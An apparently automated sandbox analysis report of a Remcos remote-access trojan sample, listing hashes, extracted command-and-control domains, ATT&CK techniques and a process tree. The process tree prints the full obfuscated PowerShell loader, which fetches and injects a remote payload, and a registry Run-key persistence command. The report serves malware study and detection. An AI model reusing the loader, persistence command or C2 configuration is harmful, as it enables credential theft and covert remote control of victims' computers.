remcos | 94a386916bc0a33eebe0a466dbfcba90ccb88891e05b0a06d0f91a84432767d1

Analysis

max time kernel
148s
max time network
138s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
22/08/2024, 10:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

94a386916bc0a33eebe0a466dbfcba90ccb88891e05b0a06d0f91a84432767d1.vbs
Size

139KB
MD5

94afb2d35a2fcfc7473b57ff851451df
SHA1

e9287d3640a1c870a14f69e4dbc6bcb9e4a3b027
SHA256

94a386916bc0a33eebe0a466dbfcba90ccb88891e05b0a06d0f91a84432767d1
SHA512

f9d6e8367df303d7ef02b695574cb68c1123349b517724b0f59f59c3410a204dbfd6c0123e1ba963bd80a879de0c109c41d15725de0a912f5d80867c229b56f9
SSDEEP

3072:BjGO63YDSdYB51Gy/ABuIWHwxoH0sHXaHb0bIkNTEx29OjmB8ZJuZ:RGO63WSdYB51Gy/quNHwaHdHqHb0bIkx

Score

10^/10

remcos wealthyblessed collection credential_access discovery persistence rat stealer

Malware Config

Extracted

Family

remcos

Botnet

WEALTHYBLESSED

janbours92harbu03.duckdns.org:3980

janbours92harbu04.duckdns.org:3981

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
true
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-03JSUC
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/2952-75-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/2080-74-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/4572-73-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/2080-74-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/4572-73-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 3 IoCs

flow	pid	Process
2	3404	WScript.exe
13	2328	powershell.exe
45	2328	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	wab.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\pericline = "%Dukkestuens% -w 1 $Vibefedt=(Get-ItemProperty -Path 'HKCU:\\Phaetons29\\').Drawbench;%Dukkestuens% ($Vibefedt)"	reg.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
180	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1348	powershell.exe
180	wab.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 1348 set thread context of 180	1348	powershell.exe	113
PID 180 set thread context of 4572	180	wab.exe	124
PID 180 set thread context of 2080	180	wab.exe	125
PID 180 set thread context of 2952	180	wab.exe	127

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wab.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wab.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wab.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wab.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1280	reg.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
2328	powershell.exe
2328	powershell.exe
1348	powershell.exe
1348	powershell.exe
1348	powershell.exe
1348	powershell.exe
2952	wab.exe
2952	wab.exe
4572	wab.exe
4572	wab.exe
4572	wab.exe
4572	wab.exe

Suspicious behavior: MapViewOfSection 5 IoCs

pid	Process
1348	powershell.exe
180	wab.exe
180	wab.exe
180	wab.exe
180	wab.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2328	powershell.exe
Token: SeDebugPrivilege	1348	powershell.exe
Token: SeDebugPrivilege	2952	wab.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
180	wab.exe

Suspicious use of WriteProcessMemory 36 IoCs

description	pid	Process	procid_target
PID 3404 wrote to memory of 2328	3404	WScript.exe	95
PID 3404 wrote to memory of 2328	3404	WScript.exe	95
PID 2328 wrote to memory of 1484	2328	powershell.exe	97
PID 2328 wrote to memory of 1484	2328	powershell.exe	97
PID 2328 wrote to memory of 1348	2328	powershell.exe	111
PID 2328 wrote to memory of 1348	2328	powershell.exe	111
PID 2328 wrote to memory of 1348	2328	powershell.exe	111
PID 1348 wrote to memory of 1556	1348	powershell.exe	112
PID 1348 wrote to memory of 1556	1348	powershell.exe	112
PID 1348 wrote to memory of 1556	1348	powershell.exe	112
PID 1348 wrote to memory of 180	1348	powershell.exe	113
PID 1348 wrote to memory of 180	1348	powershell.exe	113
PID 1348 wrote to memory of 180	1348	powershell.exe	113
PID 1348 wrote to memory of 180	1348	powershell.exe	113
PID 1348 wrote to memory of 180	1348	powershell.exe	113
PID 180 wrote to memory of 1712	180	wab.exe	118
PID 180 wrote to memory of 1712	180	wab.exe	118
PID 180 wrote to memory of 1712	180	wab.exe	118
PID 1712 wrote to memory of 1280	1712	cmd.exe	120
PID 1712 wrote to memory of 1280	1712	cmd.exe	120
PID 1712 wrote to memory of 1280	1712	cmd.exe	120
PID 180 wrote to memory of 4572	180	wab.exe	124
PID 180 wrote to memory of 4572	180	wab.exe	124
PID 180 wrote to memory of 4572	180	wab.exe	124
PID 180 wrote to memory of 4572	180	wab.exe	124
PID 180 wrote to memory of 2080	180	wab.exe	125
PID 180 wrote to memory of 2080	180	wab.exe	125
PID 180 wrote to memory of 2080	180	wab.exe	125
PID 180 wrote to memory of 2080	180	wab.exe	125
PID 180 wrote to memory of 1052	180	wab.exe	126
PID 180 wrote to memory of 1052	180	wab.exe	126
PID 180 wrote to memory of 1052	180	wab.exe	126
PID 180 wrote to memory of 2952	180	wab.exe	127
PID 180 wrote to memory of 2952	180	wab.exe	127
PID 180 wrote to memory of 2952	180	wab.exe	127
PID 180 wrote to memory of 2952	180	wab.exe	127

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\94a386916bc0a33eebe0a466dbfcba90ccb88891e05b0a06d0f91a84432767d1.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3404
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentCulture) {$Fosser='SUBsTR';$Fdestederne++;}$Fosser+='ing';Function Identitetsudviklingerne($Brombrbusk){$Nuraghe=$Brombrbusk.Length-$Fdestederne;For( $Complementary=2;$Complementary -lt $Nuraghe;$Complementary+=3){$Renlivedes+=$Brombrbusk.$Fosser.'Invoke'( $Complementary, $Fdestederne);}$Renlivedes;}function Spyhole($Bebyrdelser){ . ($Modvirkede) ($Bebyrdelser);}$Apprenticement=Identitetsudviklingerne '.dMIno zSki nlCalCha O/Si5 ,.C.0Sc Ka(O.W.niNenW,d voDewInsFr ,N,eTAk S1 e0F..Do0S,; a b.W,iiPonTe6ca4 ;,i DexUn6,p4Ec;Bo MirFovSe: S1Sv2.t1,r.Ls0Su)Or ,G CeL.cBakK,oT./Ce2Fr0Ve1 U0,u0Ma1Re0ov1B, ,FFoiHarnieVef.loG xke/Ge1An2Ud1 .Ti0 . ';$Sovemediciner=Identitetsudviklingerne 'KoUGrsO.eHjr,a-P,A ,gMee n.pt.u ';$Abildgaardes=Identitetsudviklingerne ' .hLat .tT.pUn: ./ S/Ru1Re0Ma3 ..Fu7,a7 V. a2 4 S6Po. V1S,5.a/AgR e,rfWarOpeT.s.rhVomDae mn .tSts ,. .p Cr emTe>Ekh GtG,ttepBisI.:la/ ,/Ors ,e .r Gv CrPu-PsjS k tPr. ec.ooAcm K/ HRMseMuf MrUnehrsMeh pmRee.in StCas ...lp ur,imAn ';$Repressionens=Identitetsudviklingerne 'Sh>ko ';$Modvirkede=Identitetsudviklingerne 'S.i re cxSa ';$Serviceorganisation='Vaulter';$philip = Identitetsudviklingerne 'TeegacquhP obi De%BaaGrpSkp GdS aOvtSta S% F\ .cP.oTepT,a,rrM.eCunc,tFl.DeG.eu AeA Cl& e&.l .teEncReh ,oAk rtDo ';Spyhole (Identitetsudviklingerne ' .$ FgOzlCyoF b ,aPrl A:K k Kr SoSuoPhnFoiLt=Al(NocHumNodMe Ma/PacPy Ud$Rop.rhC,iAmlG.i Vp C)V. ');Spyhole (Identitetsudviklingerne 'B.$ kg l ,oTubO.aSul r:FeBT.aMac At ,e .rfoiSaoerp .hOpa dgC.e =I,$ .A Kb,eiSplMedStg Sa .a .rBadskeUnsE.. asEbp,al RiFetBl(G.$UpRCheTrpAbrSoeU s.rs ,i Soann oeA,nPss,o)B. ');Spyhole (Identitetsudviklingerne 'St[ SNUneS.tHu.P SSue ArChvChi IcB eB PF,oCuiB nOrt OM ba BnElaFag eShr ,]Ch:La: oSEfeLacC u Br FiSttDoy RP,arVaoCatSmonec noSalBa Ch=A Pu[.tN,ae.dtYp.SaS .eFocZouTur IiCat SyOsPAlr.yo tBioSucAfoStlKlTUnyDrp SeUn]Ca:Ne:s,TScl,as ,1 2C ');$Abildgaardes=$Bacteriophage[0];$Complementarynterrace= (Identitetsudviklingerne 'Ho$K,g ,lSko bCraasl a:R,R ,a cdgii ,kAuaBol ,iS,t Te,rtDe=AfNV e rw B-VaOBub Hjd,eRecFot D DSbey esInt.aeI.mfe.PaNKaePatSo.UdWPlecob uC.ulUniN e OnDat');$Complementarynterrace+=$krooni[1];Spyhole ($Complementarynterrace);Spyhole (Identitetsudviklingerne 'Sl$ ,R Da udEmiAck Pa .l,eiAntcaeSpt ,.,rHSleE,a dMeePar Hs B[ $AfSQuoRev Be mm CeSpd ,iRacKaiS,n.ee ArDe].u=An$R APupGepKnrImeNenC,tO i ,c SeUnmSve.nn dtHi ');$Blnd115=Identitetsudviklingerne 'Fo$DrRAcaRadRiiA kS,akll,aiP.tBueVitel.UnDS oA wSan,rlProIga Nd nF DiTulTaeSe( P$StABdbMnihyl KdHeg,oa ia rrK.dGre,bsUn,E.$PrTBoaMas t i.eeForI,)Ge ';$Tastier=$krooni[0];Spyhole (Identitetsudviklingerne 'U,$ ,gIml ooTib uaRel.o:ReA,nm To Zwh,tIn= M(DeTR,e sC,t.i-dePS.at.tkahAo St$TrT NaScsElt Gi PeParSa)Cu ');while (!$Amowt) {Spyhole (Identitetsudviklingerne 'Ir$ ,g MlSto Fbpoa,olDr: TF .e DduntDoeSnrRiiDie,hrU.sCa= $ etUnrPeuIneLj ') ;Spyhole $Blnd115;Spyhole (Identitetsudviklingerne 'VaS DtSpaV rHat.e-BlSinlF e ,ePopSa Kv4St ');Spyhole (Identitetsudviklingerne ' ,$ GgWalmioGlb NaEllWh:,jA mtuoBlwHet A=B.(E.TS.e us Ct.e-ChPt aPatNdhEj Po$KrTSeaFlsM,t .i,oeA.rK.)Ex ') ;Spyhole (Identitetsudviklingerne 'La$Hygjal SoTob Tap.lno:PrsDeh,oiD,fBotSelL.eStsDis,n= d$IngOvlMuo Db saFrlUd:V CDeyGutSuoRudAre ynRedT r.eih.t oeFo5 ,7T + +s,%g.$ HB.naSkcSkt.ueFrr ,i .o .pBuhN,a Rg.ve.r.KocOpo luU,nK tB ') ;$Abildgaardes=$Bacteriophage[$shiftless];}$Sygeeksamenens=347050;$paraphemia=25698;Spyhole (Identitetsudviklingerne ' F$ igDel yoLybSya DlRa: aJTooOduDir Tn Da LlNoe,en,rs,r1Pa7 ,9Hu A =Se AfG eOrtTo-NeC,uoAsn itPoeMen.otR, Br$DeTGoaTysPatPoi.aeM.rGe ');Spyhole (Identitetsudviklingerne ' U$PagStlSpoBrbM.aMalS,:LsP,eoAmlChyB.gBeoNonCe2 C5 U Fi=f. Gr[SpSBlyGrsIntr.eAfmGv.R C.voUnn PvDieGnrExtO,]St:Vo: bF hr.ro EmPoBRaaOvsKleb,6L.4 oS.nttarTrib,nT,gAf(De$P.J,ooTruPrrBenoraPol.ce,nn KsFo1Aa7 ,9ye)N, ');Spyhole (Identitetsudviklingerne ' .$ShgM,lGto ob.ea.ol W:BaHAbezea rrH k GeB,n,niV nregAf Pr=Le o[N.SKay,rsUntS eu m h. TRueL x,utKo.SyEG,nBrcAfo.hd ,iNonUngA,] p:Sk: AAViSNiC.dIQ,IH..TiGCheOpt IS ttn rOvi nF,g y(Wa$ ,PR.o.olA y,eg .oD.n 2Ad5,r)kn ');Spyhole (Identitetsudviklingerne 'T $Pag.ol GoSibD.a TlAl: aU BnDei v ReUnrOvsGriP t va RrJii TaSenUni BsSumUn= T$BrHBoe ea rVokPaeKan i AnD,gLo.b sSluU bMostrt Ar Si.anBagPu(St$EpSOmyQug.eeTleTrkBosTraIlm AeS,nL eK nAfs.r,Tr$cop MaUnr,ta ,pbohsueS mM,i aa e)M ');Spyhole $Universitarianism;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2328
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\coparent.Gue && echo t"
    3⤵
    PID:1484
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentCulture) {$Fosser='SUBsTR';$Fdestederne++;}$Fosser+='ing';Function Identitetsudviklingerne($Brombrbusk){$Nuraghe=$Brombrbusk.Length-$Fdestederne;For( $Complementary=2;$Complementary -lt $Nuraghe;$Complementary+=3){$Renlivedes+=$Brombrbusk.$Fosser.'Invoke'( $Complementary, $Fdestederne);}$Renlivedes;}function Spyhole($Bebyrdelser){ . ($Modvirkede) ($Bebyrdelser);}$Apprenticement=Identitetsudviklingerne '.dMIno zSki nlCalCha O/Si5 ,.C.0Sc Ka(O.W.niNenW,d voDewInsFr ,N,eTAk S1 e0F..Do0S,; a b.W,iiPonTe6ca4 ;,i DexUn6,p4Ec;Bo MirFovSe: S1Sv2.t1,r.Ls0Su)Or ,G CeL.cBakK,oT./Ce2Fr0Ve1 U0,u0Ma1Re0ov1B, ,FFoiHarnieVef.loG xke/Ge1An2Ud1 .Ti0 . ';$Sovemediciner=Identitetsudviklingerne 'KoUGrsO.eHjr,a-P,A ,gMee n.pt.u ';$Abildgaardes=Identitetsudviklingerne ' .hLat .tT.pUn: ./ S/Ru1Re0Ma3 ..Fu7,a7 V. a2 4 S6Po. V1S,5.a/AgR e,rfWarOpeT.s.rhVomDae mn .tSts ,. .p Cr emTe>Ekh GtG,ttepBisI.:la/ ,/Ors ,e .r Gv CrPu-PsjS k tPr. ec.ooAcm K/ HRMseMuf MrUnehrsMeh pmRee.in StCas ...lp ur,imAn ';$Repressionens=Identitetsudviklingerne 'Sh>ko ';$Modvirkede=Identitetsudviklingerne 'S.i re cxSa ';$Serviceorganisation='Vaulter';$philip = Identitetsudviklingerne 'TeegacquhP obi De%BaaGrpSkp GdS aOvtSta S% F\ .cP.oTepT,a,rrM.eCunc,tFl.DeG.eu AeA Cl& e&.l .teEncReh ,oAk rtDo ';Spyhole (Identitetsudviklingerne ' .$ FgOzlCyoF b ,aPrl A:K k Kr SoSuoPhnFoiLt=Al(NocHumNodMe Ma/PacPy Ud$Rop.rhC,iAmlG.i Vp C)V. ');Spyhole (Identitetsudviklingerne 'B.$ kg l ,oTubO.aSul r:FeBT.aMac At ,e .rfoiSaoerp .hOpa dgC.e =I,$ .A Kb,eiSplMedStg Sa .a .rBadskeUnsE.. asEbp,al RiFetBl(G.$UpRCheTrpAbrSoeU s.rs ,i Soann oeA,nPss,o)B. ');Spyhole (Identitetsudviklingerne 'St[ SNUneS.tHu.P SSue ArChvChi IcB eB PF,oCuiB nOrt OM ba BnElaFag eShr ,]Ch:La: oSEfeLacC u Br FiSttDoy RP,arVaoCatSmonec noSalBa Ch=A Pu[.tN,ae.dtYp.SaS .eFocZouTur IiCat SyOsPAlr.yo tBioSucAfoStlKlTUnyDrp SeUn]Ca:Ne:s,TScl,as ,1 2C ');$Abildgaardes=$Bacteriophage[0];$Complementarynterrace= (Identitetsudviklingerne 'Ho$K,g ,lSko bCraasl a:R,R ,a cdgii ,kAuaBol ,iS,t Te,rtDe=AfNV e rw B-VaOBub Hjd,eRecFot D DSbey esInt.aeI.mfe.PaNKaePatSo.UdWPlecob uC.ulUniN e OnDat');$Complementarynterrace+=$krooni[1];Spyhole ($Complementarynterrace);Spyhole (Identitetsudviklingerne 'Sl$ ,R Da udEmiAck Pa .l,eiAntcaeSpt ,.,rHSleE,a dMeePar Hs B[ $AfSQuoRev Be mm CeSpd ,iRacKaiS,n.ee ArDe].u=An$R APupGepKnrImeNenC,tO i ,c SeUnmSve.nn dtHi ');$Blnd115=Identitetsudviklingerne 'Fo$DrRAcaRadRiiA kS,akll,aiP.tBueVitel.UnDS oA wSan,rlProIga Nd nF DiTulTaeSe( P$StABdbMnihyl KdHeg,oa ia rrK.dGre,bsUn,E.$PrTBoaMas t i.eeForI,)Ge ';$Tastier=$krooni[0];Spyhole (Identitetsudviklingerne 'U,$ ,gIml ooTib uaRel.o:ReA,nm To Zwh,tIn= M(DeTR,e sC,t.i-dePS.at.tkahAo St$TrT NaScsElt Gi PeParSa)Cu ');while (!$Amowt) {Spyhole (Identitetsudviklingerne 'Ir$ ,g MlSto Fbpoa,olDr: TF .e DduntDoeSnrRiiDie,hrU.sCa= $ etUnrPeuIneLj ') ;Spyhole $Blnd115;Spyhole (Identitetsudviklingerne 'VaS DtSpaV rHat.e-BlSinlF e ,ePopSa Kv4St ');Spyhole (Identitetsudviklingerne ' ,$ GgWalmioGlb NaEllWh:,jA mtuoBlwHet A=B.(E.TS.e us Ct.e-ChPt aPatNdhEj Po$KrTSeaFlsM,t .i,oeA.rK.)Ex ') ;Spyhole (Identitetsudviklingerne 'La$Hygjal SoTob Tap.lno:PrsDeh,oiD,fBotSelL.eStsDis,n= d$IngOvlMuo Db saFrlUd:V CDeyGutSuoRudAre ynRedT r.eih.t oeFo5 ,7T + +s,%g.$ HB.naSkcSkt.ueFrr ,i .o .pBuhN,a Rg.ve.r.KocOpo luU,nK tB ') ;$Abildgaardes=$Bacteriophage[$shiftless];}$Sygeeksamenens=347050;$paraphemia=25698;Spyhole (Identitetsudviklingerne ' F$ igDel yoLybSya DlRa: aJTooOduDir Tn Da LlNoe,en,rs,r1Pa7 ,9Hu A =Se AfG eOrtTo-NeC,uoAsn itPoeMen.otR, Br$DeTGoaTysPatPoi.aeM.rGe ');Spyhole (Identitetsudviklingerne ' U$PagStlSpoBrbM.aMalS,:LsP,eoAmlChyB.gBeoNonCe2 C5 U Fi=f. Gr[SpSBlyGrsIntr.eAfmGv.R C.voUnn PvDieGnrExtO,]St:Vo: bF hr.ro EmPoBRaaOvsKleb,6L.4 oS.nttarTrib,nT,gAf(De$P.J,ooTruPrrBenoraPol.ce,nn KsFo1Aa7 ,9ye)N, ');Spyhole (Identitetsudviklingerne ' .$ShgM,lGto ob.ea.ol W:BaHAbezea rrH k GeB,n,niV nregAf Pr=Le o[N.SKay,rsUntS eu m h. TRueL x,utKo.SyEG,nBrcAfo.hd ,iNonUngA,] p:Sk: AAViSNiC.dIQ,IH..TiGCheOpt IS ttn rOvi nF,g y(Wa$ ,PR.o.olA y,eg .oD.n 2Ad5,r)kn ');Spyhole (Identitetsudviklingerne 'T $Pag.ol GoSibD.a TlAl: aU BnDei v ReUnrOvsGriP t va RrJii TaSenUni BsSumUn= T$BrHBoe ea rVokPaeKan i AnD,gLo.b sSluU bMostrt Ar Si.anBagPu(St$EpSOmyQug.eeTleTrkBosTraIlm AeS,nL eK nAfs.r,Tr$cop MaUnr,ta ,pbohsueS mM,i aa e)M ');Spyhole $Universitarianism;"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1348
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\coparent.Gue && echo t"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1556
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: MapViewOfSection
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:180
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "pericline" /t REG_EXPAND_SZ /d "%Dukkestuens% -w 1 $Vibefedt=(Get-ItemProperty -Path 'HKCU:\Phaetons29\').Drawbench;%Dukkestuens% ($Vibefedt)"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1712
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "pericline" /t REG_EXPAND_SZ /d "%Dukkestuens% -w 1 $Vibefedt=(Get-ItemProperty -Path 'HKCU:\Phaetons29\').Drawbench;%Dukkestuens% ($Vibefedt)"
        6⤵
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:1280
    - - C:\Program Files (x86)\windows mail\wab.exe
        
        "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\dkgufbgienyc"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4572
    - - C:\Program Files (x86)\windows mail\wab.exe
        
        "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\nelngtrcsvqpyle"
        5⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:2080
    - - C:\Program Files (x86)\windows mail\wab.exe
        
        "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\xgqyhmcdfdiuirscmn"
        5⤵
        
        PID:1052
    - - C:\Program Files (x86)\windows mail\wab.exe
        
        "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\xgqyhmcdfdiuirscmn"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2952

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3996,i,1729213506309163284,12809566808978835441,262144 --variations-seed-version --mojo-platform-channel-handle=4380 /prefetch:8
1⤵
PID:2568

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tbwvnqda.xsl.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\dkgufbgienyc

Filesize
4KB

MD5
cda83eba5a004554ccdc061fd3df499c

SHA1
58ff2ecb9d47be10335e104896c87c62dc328523

SHA256
e384f4d46587646c6e0f9d2ee90b7bc57b49cea936b37cf8ab81ef3c4ce468ac

SHA512
f55ce20f0cf8b603fad765b889607f967c22d377fa4ac417ba1309d0aced9231e197bb4107d1c92bb99f51c04cc68ce26148727a8b694886710100c01f3de597

Download Submit
C:\Users\Admin\AppData\Roaming\coparent.Gue

Filesize
485KB

MD5
7758ad90fd9716d4927be506ea5f4681

SHA1
b44de990c314093868f0d2b7d705d999ab49ebbe

SHA256
3a4fe8b8c4ed2b23264d31acc0a182226506a05ff984b1b70602af49c236c5e1

SHA512
558f058622d2d5959fa76818085eaa653545b890732cb347d7f9c7824280066b190fbdc9d8895567ea0a7846a0f4b8f168cc06400c7411d99e7574612210e071

Download Submit
memory/180-96-0x00000000008E0000-0x0000000001B34000-memory.dmp

Filesize
18.3MB

Download
memory/180-95-0x00000000008E0000-0x0000000001B34000-memory.dmp

Filesize
18.3MB

Download
memory/180-91-0x00000000219C0000-0x00000000219D9000-memory.dmp

Filesize
100KB

Download
memory/180-92-0x00000000219C0000-0x00000000219D9000-memory.dmp

Filesize
100KB

Download
memory/180-88-0x00000000219C0000-0x00000000219D9000-memory.dmp

Filesize
100KB

Download
memory/180-59-0x00000000008E0000-0x0000000001B34000-memory.dmp

Filesize
18.3MB

Download
memory/180-58-0x00000000008E0000-0x0000000001B34000-memory.dmp

Filesize
18.3MB

Download
memory/1348-47-0x0000000008670000-0x0000000008C14000-memory.dmp

Filesize
5.6MB

Download
memory/1348-49-0x0000000008C20000-0x000000000CD25000-memory.dmp

Filesize
65.0MB

Download
memory/1348-28-0x0000000005880000-0x00000000058A2000-memory.dmp

Filesize
136KB

Download
memory/1348-29-0x0000000005920000-0x0000000005986000-memory.dmp

Filesize
408KB

Download
memory/1348-30-0x0000000005990000-0x00000000059F6000-memory.dmp

Filesize
408KB

Download
memory/1348-40-0x0000000006220000-0x0000000006574000-memory.dmp

Filesize
3.3MB

Download
memory/1348-41-0x0000000006860000-0x000000000687E000-memory.dmp

Filesize
120KB

Download
memory/1348-42-0x0000000006890000-0x00000000068DC000-memory.dmp

Filesize
304KB

Download
memory/1348-43-0x0000000007FF0000-0x000000000866A000-memory.dmp

Filesize
6.5MB

Download
memory/1348-44-0x0000000006DC0000-0x0000000006DDA000-memory.dmp

Filesize
104KB

Download
memory/1348-45-0x0000000007970000-0x0000000007A06000-memory.dmp

Filesize
600KB

Download
memory/1348-46-0x0000000007870000-0x0000000007892000-memory.dmp

Filesize
136KB

Download
memory/1348-27-0x0000000005AF0000-0x0000000006118000-memory.dmp

Filesize
6.2MB

Download
memory/1348-26-0x0000000002F50000-0x0000000002F86000-memory.dmp

Filesize
216KB

Download
memory/2080-74-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2080-68-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2080-70-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
